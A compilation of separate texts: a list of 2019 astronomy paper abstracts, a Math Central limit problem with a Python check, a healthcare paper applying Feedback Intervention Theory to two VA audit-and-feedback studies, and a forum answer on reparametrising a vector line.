A remarkable, large‐amplitude, mountain wave (MW) breaking event was observed on the night of 21 June 2014 by ground‐based optical instruments operated on the New Zealand South Island during the Deep Propagating Gravity Wave Experiment (DEEPWAVE). Concurrent measurements of the MW structures, amplitudes, and background environment were made using an Advanced Mesospheric Temperature Mapper, a Rayleigh Lidar, an All‐Sky Imager, and a Fabry‐Perot Interferometer. The MW event was observed primarily in the OH airglow emission layer at an altitude of ~82 km, over an ~2‐hr interval (~10:30–12:30 UT), during strong eastward winds ...
Searching For Trends In Atmospheric Compositions Of Extrasolar Planets, 2019 Humboldt State University
#### Searching For Trends In Atmospheric Compositions Of Extrasolar Planets, Kassandra Weber, Paola Rodriguez Hidalgo, Adam Turk, Troy Maloney, Stephen Kane
##### IdeaFest: Interdisciplinary Journal of Creative Works and Research from Humboldt State University
No abstract provided.
To Apply Or Not To Apply: A Survey Analysis Of Grant Writing Costs And Benefits, 2019 Embry-Riddle Aeronautical University
#### To Apply Or Not To Apply: A Survey Analysis Of Grant Writing Costs And Benefits, Ted Von Hippel, Courtney Von Hippel
##### Ted von Hippel
We surveyed 113 astronomers and 82 psychologists active in applying for federally funded research on their grant-writing history between January, 2009 and November, 2012. We collected demographic data, effort levels, success rates, and perceived non-financial benefits from writing grant proposals. We find that the average proposal takes 116 PI hours and 55 CI hours to write; although time spent writing was not related to whether the grant was funded. Effort did translate into success, however, as academics who wrote more grants received more funding. Participants indicated modest non-monetary benefits from grant writing, with psychologists reporting a somewhat ...
Hyper Wide Field Imaging Of The Local Group Dwarf Irregular Galaxy Ic 1613: An Extended Component Of Metal-Poor Stars, 2019 University of Arizona
#### Hyper Wide Field Imaging Of The Local Group Dwarf Irregular Galaxy Ic 1613: An Extended Component Of Metal-Poor Stars, Ragadeepika Pucha, Jeffrey L. Carlin, Beth Willman, Jay Strader, David J. Sand, Keith Bechtol, Jean P. Brodie, Denija Crnojević, Duncan A. Forbes, Christopher Garling, Jonathan Hargis, Annika H.G. Peter, Aaron J. Romanowsky
##### Aaron J. Romanowsky
Stellar halos offer fossil evidence for hierarchical structure formation. Since halo assembly is predicted to be scale-free, stellar halos around low-mass galaxies constrain properties such as star formation in the accreted subhalos and the formation of dwarf galaxies. However, few observational searches for stellar halos in dwarfs exist. Here we present gi photometry of resolved stars in the isolated Local Group dwarf irregular galaxy IC 1613 ($M_{\star} \sim 10^{8}\,M_{\odot}$). These Subaru/Hyper Suprime-Cam observations are the widest and deepest of IC 1613 to date. We measure surface density profiles of young main-sequence, intermediate to old red giant branch, and ancient ...
Spatially Resolved Stellar Kinematics Of The Ultra-Diffuse Galaxy Dragonfly 44. I. Observations, Kinematics, And Cold Dark Matter Halo Fits, 2019 Yale University
#### Spatially Resolved Stellar Kinematics Of The Ultra-Diffuse Galaxy Dragonfly 44. I. Observations, Kinematics, And Cold Dark Matter Halo Fits, Pieter Van Dokkum, Asher Wasserman, Shany Danieli, Roberto Abraham, Jean Brodie, Charlie Conroy, Duncan A. Forbes, Christopher Martin, Matt Matuszewski, Aaron J. Romanowsky, Alexa Villaume
##### Aaron J. Romanowsky
We present spatially resolved stellar kinematics of the well-studied ultra-diffuse galaxy (UDG) Dragonfly 44, as determined from 25.3 hr of observations with the Keck Cosmic Web Imager. The luminosity-weighted dispersion within the half-light radius is ${\sigma }_{1/2}={33}_{-3}^{+3}$ km s−1, lower than what we had inferred before from a DEIMOS spectrum in the Hα region. There is no evidence for rotation, with ${V}_{\max }/\langle \sigma \rangle \lt 0.12$ (90% confidence) along the major axis, in possible conflict with models where UDGs are the high-spin tail of the normal dwarf galaxy ...
2019 California Polytechnic State University, San Luis Obispo
#### Brightest Cluster Galaxy Evolution Exploration: Comparing The Separation Of Cluster X-Ray Light And Visible Wavelength Galaxy Light With Spectral Data, Matthew Aaron Salinas
##### Physics
Brightest Cluster Galaxies (BCGs), the brightest galaxy in a cluster of hundreds to thousands of galaxies, are some of the biggest, brightest, and most massive galaxies in the universe. Characterizing a BCG can help discover more about galaxy evolution - the aging, changing, and possible merging (collisions) of galaxies. This project involves determining the separation of the peak of x-ray emission of the galaxy cluster, and the peak of visible emission of the BCG to characterize the system as being disturbed or undisturbed that can then lead to discoveries about its formation and evolution. We have found that 17.4% of ...
Spatially Resolved Stellar Populations And Kinematics With Kcwi: Probing The Assembly History Of The Massive Early-Type Galaxy Ngc 1407, 2019 Universitat de Barcelona
#### Spatially Resolved Stellar Populations And Kinematics With Kcwi: Probing The Assembly History Of The Massive Early-Type Galaxy Ngc 1407, Anna Ferré-Mateu, Duncan A. Forbes, Richard M. Mcdermid, Aaron J. Romanowsky, Jean P. Brodie
##### Aaron J. Romanowsky
Using the newly commissioned Keck Cosmic Web Imager (KCWI) instrument on the Keck II telescope, we analyze the stellar kinematics and stellar populations of the well-studied massive early-type galaxy (ETG) NGC 1407. We obtained high signal-to-noise integral field spectra for a central and an outer (around one effective radius toward the southeast direction) pointing with integration times of just 600 s and 2400 s, respectively. We confirm the presence of a kinematically distinct core also revealed by VLT/MUSE data of the central regions. While NGC 1407 was previously found to have stellar populations characteristic of massive ETGs (with radially ...
Figure 8: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 8: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided.
Figure 3: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 3: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided.
Figure 5: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 5: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided.
Figure 9: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 9: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided.
Figure 2: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 2: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided.
Figure 10: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 10: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided. |
Math Central Quandaries & Queries
Question from Soham: Find the value of $\lim_{x \to 1} \frac{x + x^2 + x^3 + \cdots + x^n - n}{x - 1}.$
Hi Soham,
Write the numerator as
$\left(x - 1\right) + \left(x^2 - 1\right) + \left(x^3 - 1\right) + \cdots + \left(x^n - 1\right).$
In the expression above each of the terms
$\left(x^k - 1\right)$
can be factored.
Can you complete the problem now?
Penny
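Following Penny's hint, each factored term $(x^k - 1)/(x - 1) = 1 + x + \cdots + x^{k-1}$ tends to $k$ as $x \to 1$, so the limit is $1 + 2 + \cdots + n = n(n+1)/2$. An illustrative numerical check:

```python
# Numerically verify the limit equals n*(n+1)/2 (here n = 5, limit = 15).
def quotient(x: float, n: int) -> float:
    """(x + x**2 + ... + x**n - n) / (x - 1), defined for x != 1."""
    return (sum(x ** k for k in range(1, n + 1)) - n) / (x - 1)

n = 5
print(quotient(1 + 1e-7, n), n * (n + 1) // 2)
```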
Math Central is supported by the University of Regina and The Pacific Institute for the Mathematical Sciences. |
Theory-based and evidence-based design of audit and feedback programmes: examples from two clinical intervention studies
1. Sylvia J Hysong1,2,
2. Harrison J Kell3,
3. Laura A Petersen1,2,
4. Bryan A Campbell4,
5. Barbara W Trautner1,2
1. 1Center for Innovations in Quality, Effectiveness and Safety, Michael E. DeBakey VA Medical Center, Houston, Texas, USA
2. 2Baylor College of Medicine, Houston, Texas, USA
3. 3Educational Testing Service, Morrisville, Pennsylvania, USA
4. 4Normal Modes, Durham, North Carolina, USA
1. Correspondence to Dr Sylvia Hysong, Center for Innovations in Quality, Effectiveness and Safety, Michael E. DeBakey VA Medical Center, Houston TX 77030, USA; Hysong{at}bcm.edu
## Abstract
Background Audit and feedback (A&F) is a common intervention used to change healthcare provider behaviour and, thus, improve healthcare quality. Although A&F can be effective, its effectiveness varies, often due to the details of how A&F interventions are implemented. Some have suggested that a suitable conceptual framework is needed to organise the elements of A&F and also explain any observed differences in effectiveness. Through two examples from applied research studies, this article demonstrates how a suitable explanatory theory (in this case Kluger & DeNisi's Feedback Intervention Theory (FIT)) can be systematically applied to design better feedback interventions in healthcare settings.
Methods Case 1: this study's objective was to reduce inappropriate diagnosis of catheter-associated urinary tract infections (CAUTI) in inpatient wards. Learning to identify the correct clinical course of action from the case details was central to this study; consequently, the feedback intervention featured feedback elements that FIT predicts would best activate learning processes (framing feedback in terms of group performance and provision of correct solution information). We designed a highly personalised, interactive, one-on-one intervention with healthcare providers to improve their capacity to distinguish between CAUTI and asymptomatic bacteriuria (ASB) and treat ASB appropriately. Case 2: simplicity and scalability drove this study's intervention design, employing elements that FIT predicts positively impact effectiveness while still facilitating deployment and scalability (eg, delivered via computer, delivered in writing). We designed a web-based, report-style feedback intervention to help primary care physicians improve their care of patients with hypertension.
Results Both studies exhibited significant improvements in their desired outcome and in both cases interventions were received positively by feedback recipients.
Summary A&F has been a popular, yet inconsistently implemented and variably effective tool for changing healthcare provider behaviour and improving healthcare quality. Through the systematic use of theory such as FIT, robust feedback interventions can be designed that yield greater effectiveness. Future work should look to the comparative effectiveness of specific design elements and the contextual factors that identify A&F as the optimal intervention to effectuate healthcare provider behaviour change.
Trial registration number NCT01052545, NCT00302718; post-results.
• Audit and feedback
• Health services research
• Quality improvement methodologies
## Background
Audit and feedback (A&F) is a common intervention for changing healthcare provider behaviour and improving healthcare quality.1 ,2 A&F can be defined as ‘a summary of clinical performance (audit) over a specific period of time, and the provision of that summary (feedback) to individual practitioners, teams, or healthcare organizations.’3 A&F is an appealing intervention because of its seemingly straightforward approach to behaviour change: by receiving current information about their performance (‘knowledge of results’), providers are more motivated to improve.4 ,5 A&F has been used to improve a wide range of behaviours in clinical practice across many settings,2 making it highly flexible. Further, A&F is often the first step in awarding financial incentives to providers; consequently, the design and implementation of an A&F intervention can materially impact quality of care, as well as costs for patients, providers and healthcare organisations.6 Thus, the nature and characteristics of both the outcome and the feedback intervention must be considered to achieve the desired results.
Studies within healthcare, including a Cochrane review, suggest that A&F can improve patient care effectively;2 however, others have found that A&F varies in effectiveness and have attributed this inconsistency to the design of specific interventions.2 Many A&F studies inadequately describe their interventions and do not detail their underlying causal processes, making it difficult to compare feedback interventions across different healthcare settings.1
Theory and conceptual frameworks are important yet underused tools in healthcare for successfully designing behaviour-change interventions. Michie and Abraham7 posit that, to design interventions that truly change behaviour, one must rely on empirically supported theories of behaviour change that identify both psychological antecedents and operating mechanisms of behaviour change. This contention is echoed in the A&F literature. Foy and colleagues suggest a conceptual framework is needed to organise the elements of A&F and explain observed differences in effectiveness.1 Ivers et al8 contend that using theory in designing, implementing or interpreting A&F interventions can help clarify the behavioural causal pathways and their underlying mechanisms, resulting in more effective feedback interventions. Unfortunately, explicit use of theories to design A&F interventions is rare, with little consensus as to appropriate theories.3
Another potential problem is that not all theories are well suited to aid in intervention design; at minimum, the theory must clearly describe the mechanism behind the behaviour change and be supported by independent work.7 For example, Rogers' Diffusion of Innovation Theory9 and Bandura's Social Cognitive Theory10 have been reported as the two theories most often used in A&F intervention design. Yet, the suitability of these theories for this purpose has been questioned due to their lack of specificity.3 Similarly, implementation-oriented frameworks such as PARIHS can guide contextual factors to be considered to ensure successful implementation; however, they may not be able to help identify the kinds of features an intervention requires to be optimally effective in a given context or across multiple contexts. Often, it is necessary to draw from numerous theories to accomplish that goal. In the case of A&F, Kluger and DeNisi11 have already conducted such a synthesis to produce Feedback Intervention Theory (FIT). Specifically designed for explaining feedback's operating mechanisms, FIT draws from cognitive and motivational theories to formulate its tenets, including control theory,12 ,13 goal-setting theory,14 the multiple-cue probability learning paradigm,15 social cognition10 and learned helplessness theory, to offer clear propositions for how feedback works and what cues are likely to improve feedback effectiveness. Through two examples from applied research studies using FIT-based feedback interventions, the present article demonstrates how FIT can be systematically applied in healthcare settings to design better feedback interventions.
## Feedback intervention theory: a brief primer
According to FIT, people regulate their behaviour by comparing it to goals, standards or benchmarks to which they have committed.14 When they observe a discrepancy between the standard and their actual behaviour, they try to resolve it by adjusting their level of effort to increase the likelihood that the benchmark will be met; the degree of increased effort an individual will undertake can be altered by providing performance feedback. For example, physicians who prescribe a particular medication for a given condition are likely to continue prescribing it until some external influence, such as a patient request for a cheaper alternative, compels them to change. Since individuals' attention is limited, only gaps receiving attention have the potential for change; for example, an alert in the computerised prescription order-entry system could bring a cheaper medication to the physician's attention, thereby increasing the likelihood of switching to the new medication. Thus, feedback interventions work by providing new information that redirects recipients' locus of attention either away from the task (eg, towards the self or towards irrelevant tasks) or towards the task. Kluger and DeNisi propose that three factors determine how effectively this attentional shift occurs: characteristics of the feedback itself (or ‘feedback intervention cues’), the nature of the task (‘task characteristics’), and personality and situational variables.11 Feedback cues determine the direction towards which attention will likely shift; task characteristics determine how susceptible the task is to attentional shifts; and personality and situational variables determine how the feedback recipient chooses to change once the attentional shift occurs.
According to FIT, feedback cues that redirect the locus of attention towards the task itself reinforce extant motivational processes, thereby strengthening feedback's effect on task performance; similarly, cues that redirect attention towards details of the task tend to promote learning and also strengthen feedback's effect on task performance; conversely, information that shifts attention away from the task diverts cognitive resources away from trying to improve, thereby weakening feedback's effect.11 Figure 1 graphically depicts the basic tenets of FIT.
Figure 1
Schematic of tenets of Feedback Intervention Theory.
Kluger and DeNisi,11 Hysong16 and Ivers et al2 independently found via meta-analysis that feedback has a generally moderate effect on performance. Additionally, the Kluger and DeNisi and the Hysong meta-analyses explicitly tested the tenets of FIT and identified several feedback intervention characteristics that enhance feedback effectiveness, including correct solution information (information about how to do the task correctly), velocity (change from last period of measurement), graphical or written presentation formats, inclusion of normative information, neutral tone and other goal-setting components. Characteristics found to decrease feedback effectiveness included discouraging tone, praiseful tone and verbal feedback.11 Table 1 summarises and defines characteristics predicted by FIT to impact feedback effectiveness, and the effect reported by each meta-analysis. As shown in this table, these three independent meta-analyses exhibit several parallels. Although theory and evidence seem to disagree about which elements of feedback are ineffective, there appears to be good congruence about the more effective elements of feedback. Due to its versatile framework and demonstrable improvements in A&F effectiveness both inside and outside healthcare settings,17–19 FIT is a suitable guide for the design of A&F interventions across a variety of contexts.
Table 1
Factors predicted to impact feedback effectiveness by Feedback Intervention Theory and by Cochrane systematic review
The following case examples demonstrate how the principles of FIT were applied to design A&F interventions for two different healthcare scenarios, both of which led to improvements in two different healthcare quality outcomes. As the theory provides the most guidance about the effectiveness of feedback intervention cues, and feedback design is the element over which organisations and researchers have the most control, the cases concentrate on the feedback cues selected in the design of the feedback intervention.
## Case 1: Reducing inappropriate diagnosis of catheter-associated urinary tract infection via case-specific feedback
We employed FIT to design an A&F intervention in the United States Department of Veterans Affairs Veterans Health Administration (VHA) to improve internal medicine resident and long-term care personnel's capacity to distinguish between asymptomatic bacteriuria (ASB) and catheter-associated urinary tract infection (CAUTI). ASB is frequently misdiagnosed as CAUTI, often leading to unnecessary use of antibiotics, in turn leading to resistant organisms, unnecessary cost, prolonged hospital stays and infections such as Clostridium difficile-associated disease.20 Details of the CAUTI study's design, including the A&F intervention, are published elsewhere;21 highlights are summarised here.
### Participants
The A&F intervention was applied to 169 healthcare providers who make the decision to order a urine culture and prescribe antibiotics for a positive urine culture in two types of hospital units: acute-care medicine wards and long-term care units. In the acute-care medicine wards, internal medicine residents (trainees), usually interns or second-year residents, were generally responsible for making decisions about prescribing antibiotics for positive urine cultures, under supervision from a rotating pool of attending physicians. In the extended-care ward, the A&F intervention targeted the nurse practitioners, physician assistants and staff physicians who comprised the providers responsible for prescribing antibiotics for positive urine cultures.
### Intervention
The intervention was based on a treatment algorithm derived from the Infectious Diseases Society of America guidelines for the non-treatment of ASB. This treatment algorithm describes steps providers should take when confronted with a patient with an indwelling urinary catheter and a subsequent positive urine culture.22 All participants' cases involving positive urine cultures were identified via a comprehensive chart review and examined by trained research staff for errors in diagnosis and treatment of ASB cases (defined as deviations from the treatment algorithm). For each clinician, the team identified a subset of cases that would teach the guideline principles clearly, keeping the ratio of erroneously to correctly managed cases to approximately 1:2. Research staff contacted the clinical providers involved to deliver the feedback intervention face to face, which consisted of a one-on-one feedback session reviewing each ASB case. For each case, an interactive hyperlinked PowerPoint presentation was used as an explanatory device during the feedback meeting (see online supplementary appendix A) and given to participants to keep.
### Intervention design considerations
In developing the algorithm to be used for classifying cases in the study, we learnt that clinicians routinely caring for patients with urinary catheters use mental models that often deviate from guidelines when classifying cases of catheter-associated bacteriuria as either ASB or CAUTI.22 Thus, designing an intervention that shifted attention to the details of the task and fostered better learning of the guideline, so that physicians' mental models could be altered, was paramount. This drove our design over other factors, such as labour intensiveness or wide-scale deployment capabilities (all participants were physicians at local hospitals within 1.5 miles of each other and the research team). To accomplish our goal, we opted for an interactive, computer-based presentation of feedback, which FIT predicts would be less likely to shift attention away from the task than simple verbal presentation. The presentation's interactive nature was also intended to shift attention to the details of the task: it showed the physician the specific decision path he or she took, highlighted correct and incorrect decisions (a step towards correct-solution information) and provided correct solution information (one of the most effective cues according to the meta-analytic effect sizes reported earlier) by revealing the correct course of action when a participant clicked on a series of yes-or-no links in the presentation. Finally, because Ivers et al2 showed that providing both verbal and written feedback yielded better results than written feedback alone, research staff reviewed the treatment algorithm verbally with participants as they followed along on the interactive presentation; however, the research staff used a written, standardised but branching script to accomplish this task. The standardised script ensured that every participant received the same relevant feedback for each decision point in the diagnosis/treatment of ASB/CAUTI.
Table 2 summarises how each feedback design characteristic was operationalised for the study.
Table 2
Operationalisation of feedback design characteristics Case 1
### Measures
#### Reactions to feedback
After delivering personalised feedback to individual participants, research assistants completed Smither and colleagues' 11-item scale to capture feedback recipients' reactions to their feedback, specifically targeting recipients' perceptions of the value of the feedback, the recipient's sense of obligation to use the feedback and the extent to which the recipient was concerned with others' perceptions of his/her performance.24 Feedback recipients also completed questions about the clarity, usability, tolerability and degree of acceptance of the feedback received.
#### Effectiveness of feedback intervention
Postintervention chart monitoring at the ward level captured the effectiveness of the A&F intervention. For 6 months after the feedback intervention was implemented, charts for each ward were monitored for adherence to the treatment algorithm, specifically, rates of urine-culture orders and inappropriate use of antibiotics.
### Results
#### Reactions to feedback
Most feedback recipients reacted positively to feedback received, indicating that they were open and accepting of the feedback and motivated to improve; mean feedback acceptance scores were high (M=5.18/7, SD=0.26), as were tolerability (M=5.81, SD=0.07) and usability scores (M=5.27, SD=0.04).
Based on research assistants' reports of recipients' reactions, the PowerPoint presentation received positive reactions, as it organised the guidelines for ASB and CAUTI classification and treatment in a simple, understandable way without loss of information fidelity. Though feedback recipients occasionally tried to justify their original decisions, the feedback session quickly turned to the evidence and became a learning opportunity for the recipient.
#### Effectiveness of feedback intervention
The overall rate of urine-culture ordering in wards where participants received A&F decreased significantly during the intervention period (from 41.2 to 23.3 per 1000 bed-days; incidence rate ratio (IRR) 0.57; 95% CI 0.53 to 0.61; p<0.0001) and further during the maintenance period (12 per 1000 bed-days; IRR 0.29; 95% CI 0.26 to 0.32; p<0.0001). At the comparison site, urine cultures ordered did not change significantly across all three periods. Overtreatment of ASB at the intervention site decreased significantly (from 1.6 to 0.5 per 1000 bed-days; IRR 0.35; 95% CI 0.22 to 0.55; p<0.0001) during the intervention period; these reductions persisted (0.4 per 1000 bed-days; IRR 0.24; 95% CI 0.13 to 0.42) during the maintenance period. Overtreatment of ASB at the comparison site was similar across all time periods.25
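As a quick arithmetic check (a hypothetical helper, not the paper's analysis; the published IRRs come from a regression model and so need not equal the raw ratios), the unadjusted rate ratios can be recovered from the reported rates per 1000 bed-days:

```python
def rate_ratio(rate_after, rate_before):
    """Unadjusted incidence rate ratio: the event rate in the later
    period divided by the rate in the baseline period."""
    return rate_after / rate_before
```

For urine-culture ordering, 23.3/41.2 and 12/41.2 reproduce the reported IRRs of 0.57 and 0.29 to two decimals; the ASB overtreatment ratio 0.5/1.6 ≈ 0.31 differs slightly from the reported 0.35, presumably because of model adjustment.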
## Case 2: Helping physicians provide guideline-recommended hypertension care via summary feedback
In this second case, we used FIT to design an A&F intervention to help physicians meet their goals for controlling patients' hypertension, as part of a randomised controlled trial of financial incentives to improve delivery of guideline-recommended hypertension care.26 ,27 Despite evidence that hypertension treatment is effective, the condition is undertreated by physicians and controlled in less than one-fourth of US citizens.28 Hypertension is a risk factor for stroke, coronary artery disease and congestive heart failure.
Although the intervention of interest in this hypertension study was financial incentives, A&F constituted an important component of the financial-incentive intervention, as it served as the principal tool for justifying the size of the incentive awarded to any recipient. Moreover, A&F served as the comparable activity for the control group. All participants (regardless of study arm) received A&F on their hypertension care; only the various financial-incentive configurations tested in the study differentiated the study arms. The details of the financial-incentive intervention have been published elsewhere;26 only the A&F design is discussed here.
### Participants
Eighty-three primary care physicians from 12 geographically dispersed VHA medical centres participated in this study. Additionally, non-physician clinicians (n=42) in trial groups receiving practice-based incentives (see below) also participated.
### Intervention
Over 20 months, participants received web-based A&F reports every 4 months. Each report presented participants with percentage scores for patients receiving hypertension therapy, patients meeting goal blood pressure (BP) levels during last visit and patients receiving hypertension therapy that also met goal BP levels during last visit. Percentage scores were given, both for patients the physician treated during each period and for patients treated by other physicians at the same clinic during that period (in aggregate). Additionally, suggested performance goals for the subsequent performance period were also included.
### Intervention design considerations
Several factors drove the design of this intervention. The nature of the task was an important consideration. FIT predicts that less complex tasks such as ordering guideline-recommended medication in the presence of consistently elevated BP29 are more susceptible to being positively influenced by feedback (see table 1); consequently, maintaining attention on the task and activating motivational processes (rather than trying to foster learning, as in the previous case) was a sufficient approach for this intervention. Practical matters also heavily influenced the design: this study involved hospitals geographically dispersed across the country, where often no prior relationship existed between the site and the research team. Target feedback recipients were busy primary care clinicians with little time to participate in a research study; in addition, feedback in this case was the control intervention, rather than the intervention of interest. Consequently, ease of delivery and minimal participant burden were key in this case—we sought to design feedback that could be deployed easily from a remote location, reviewed easily by participants and quickly show where gaps in their performance lay.
To accomplish our goal, we designed a web-based written report providing summary-based feedback. Each report depicted scores about each hypertension management aspect of interest; this provides some degree of correct-solution information by shifting attention to the specific aspect of hypertension management requiring most attention (eg, ordering new medication vs adjusting existing treatment). We also provided achievable goals for participants to strive towards for the following period, which work to activate recipients' motivational processes. Reports also contained group feedback and velocity information in the form of line graphs depicting individual and clinic score histories for hypertension treatment and meeting goal BP levels. Both velocity and group feedback cues improve feedback effectiveness by activating recipients' motivation processes and keeping attention focused on the task. Table 3 summarises how each feedback design characteristic was operationalised for the study. Appendix B presents an example of the feedback report used.
Table 3
Operationalisation of feedback characteristics for Case 2
### Results
#### Reactions to feedback
A random subset of 28 physicians were interviewed at the 16-month mark to gain more in-depth knowledge of their hypertension management experiences during the study. Among the topics discussed were the quality of feedback received and suggestions for improvement. Interview respondents reported finding the feedback reports useful, as they were more detailed and focused than the performance measure reports they normally receive as part of their regular work duties:31

> I think it [the RCT feedback report used in this study] is a more accurate reflection, I don't find the [VA-generated] facility reports very useful. —Physician, Site #9

> We get reports but it's buried amongst, like, ‘Do you look at the diabetic's foot’ or whatever. I can't say I've really scrutinized those either. Yours is more targeted. —Physician, Site #2
#### Effectiveness of feedback intervention
Mean (SD) total payments over the study were US$4270 (US$459), US$2672 (US$153) and US$1648 (US$248) for the combined, individual and practice-level interventions, respectively. Relative to controls who received A&F alone, only the individual-incentives group exhibited significant changes in either BP control or appropriate response to uncontrolled BP. Change in guideline-recommended medication use was not significantly different from that in the control group. The effect of the incentive was not sustained after a washout period. However, we observed an average 11% increase (SD=2.87) in use of guideline-recommended antihypertensive medications between periods 1 and 5; this included the control group, who only received A&F reports.27
## Discussion
A&F has been a popular tool employed to change healthcare provider behaviour and improve healthcare quality; however, it has suffered from inconsistent, atheoretical implementation, leading to mixed levels of effectiveness.1 FIT provides a practical, evidence-based framework with which to design feedback interventions. We have presented two different real-world feedback interventions designed using the principles of FIT, both positively accepted by their intended recipients and demonstrating significant improvements in desired clinical behaviours in the presence of well-designed feedback.
In both cases, feedback was presented in writing, via computer, using a standardised structure whose content was individualised for each participant. In addition, Case 1 featured very specific correct solution information, whereas Case 2 featured individualised goal setting and norms. Correct solution information and goal setting are two of the most powerful feedback design features for maximising effectiveness,11 ,16 and in some cases their combined use is warranted. In these two cases, however, the designers' decision to use only one or the other feature, as well as the designers' respective selections, were driven by the context in which the A&F intervention was being used (consistent with the PARIHS framework) and by the features of the desired outcome. In Case 1, the desired outcome was correct diagnosis and subsequently appropriate treatment of ASB; many possible decisions could have led to a wrong outcome; consequently, providing correct solution information about where the physician should have made a different choice was imperative. Conversely, in Case 2 the desired outcome was BP control and antihypertensive medication prescription; in this case the path to the correct outcome was far clearer and simpler; consequently, the more important design feature was to provide the motivational effect of goal setting to remind providers to carry out the desired actions they already knew they should. These findings demonstrate the need to consider both the desired outcome and feedback characteristics when designing a feedback intervention for maximum effect.
The two cases presented here covered two different healthcare scenarios; consequently, the A&F interventions featured rather different characteristics. So how do A&F designers decide which components to choose for their interventions? The commonalities between the two cases can prove instructive. Both cases selected components that were individually tailored to the feedback recipient (consistent with FIT and Hysong et al),32 and that directed attention to the details of the task, consistent with FIT. The nature of which components to use (eg, written/computerised feedback, correct solution information, goal setting), in both cases, was driven by the situational and organisational context. The role of context on feedback effectiveness is an area for which FIT does not provide much guidance and is a limitation of the theory. However, newer research and theories can be drawn upon to fill this gap and are excellent opportunities for future research.33 For example, depending on whether feedback recipients tend to be more performance versus mastery oriented, research suggests feedback should be customised to align with those recipient characteristics.34 Recent research has also recommended encouraging feedback-seeking behaviours from employees and focusing on creating a culture of feedback where employees feel safe at giving and receiving feedback and have opportunity for reflection; this can take the form of both formal and informal forms of feedback.34 ,35
## Limitations
The studies presented in the two cases, although guided by FIT to design a robust intervention that would be successful, were not designed for purposes of comparative effectiveness or to tease apart the effects of specific feedback elements; rather they were guided by FIT to design the intervention most likely to result in successful behaviour change, given the contextual constraints of the respective studies. Thus, the presentation of the two cases, while useful for presenting annotated examples of the design considerations for building successful, theory-based interventions using FIT, cannot speak to the matter of comparing the relative effectiveness of specific design elements of feedback.
The main limitation in our case presentation concerns limitations of the theory itself; FIT adopts an inherently cognitive perspective towards feedback; consequently, recipient motivations and contextual (situational) variables are outside the scope of the theory; additionally, because it adopts a cognitive perspective it is inherently individually based and does not address feedback in team contexts,36 as is the case with newer frameworks.37 Despite these limitations, newer research and theories (eg, DeShon et al37) have built upon the work of FIT precisely due to its clear and specific propositions and rationales; also, where the scenario lends itself to it, FIT can provide specific direction for designing A&F interventions, as it did with the two cases presented here.
## Conclusion
We conclude that FIT can be effectively used to design feedback interventions to more effectively improve provider performance and quality of healthcare. Future work should focus on expanding understanding of specific contextual cues that impact feedback effectiveness (whether for individuals or teams) to provide more specific guidance towards A&F intervention design.
## Footnotes
• Contributors SH conceived and wrote the first draft of the paper and designed the A&F interventions presented in each case. BWT was the principal investigator of the study presented in Case 1; LAP was the principal investigator of the study presented in Case 2. HJK aided in the design of Case 1's audit & feedback intervention and designed the ‘reactions to feedback’ component of Case 1; BAC edited subsequent drafts of the paper and provided material intellectual input. All authors provided critical intellectual input and material edits for the paper.
• Funding Veterans Administration, Health Services Research and Development Program (CDA 07-0181), (IIR 04-349) and (IIR 09-104); and National Heart Lung and Blood Institute (1R01HL079173-01), (R01HL079173-S2).
• Competing interests None declared.
• Ethics approval Institutional review boards for Baylor College of Medicine and Michael E. DeBakey VA Medical Center.
• Provenance and peer review Not commissioned; externally peer reviewed.
• i PARIHS—Promoting Action on Research Implementation in Health Services.
1. ## Further Manipulation: Vectors
How was:
$\mathbf{r} = \left(3\mathbf{i}+1\mathbf{j}-\frac72\mathbf{k}\right)+s \left(8\mathbf{i}-4\mathbf{j}+5\mathbf{k}\right)$
Manipulated to:
$\mathbf{r} = \left(7\mathbf{i}-1\mathbf{j}-1\mathbf{k}\right)+\lambda \left(8\mathbf{i}-4\mathbf{j}+5\mathbf{k}\right)$
2. Originally Posted by Air
How was:
$\mathbf{r} = \left(3\mathbf{i}+1\mathbf{j}-\frac72\mathbf{k}\right)+s \left(8\mathbf{i}-4\mathbf{j}+5\mathbf{k}\right)$
Manipulated to:
$\mathbf{r} = \left(7\mathbf{i}-1\mathbf{j}-1\mathbf{k}\right)+\lambda \left(8\mathbf{i}-4\mathbf{j}+5\mathbf{k}\right)$
Make the replacement $s = \lambda + \frac{1}{2}$.
Since both $s$ and $\lambda$ range over all real numbers, you get the same line $\vec{r}$ using either parameter.
